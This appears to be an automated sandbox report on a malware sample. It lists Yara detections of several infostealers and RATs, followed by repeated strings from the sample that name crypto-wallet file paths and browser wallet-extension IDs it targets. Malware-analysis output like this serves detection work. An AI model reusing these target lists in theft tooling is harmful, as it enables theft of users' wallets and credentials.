Source: Yara match	File source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19524750000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be8eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19524750000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2024395013.000001950682B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 21.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5c100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5c100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ougwwmmp, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7092, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2129887694.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5mc.0.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5mc.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5mc.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5mc.0.exe PID: 7364, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 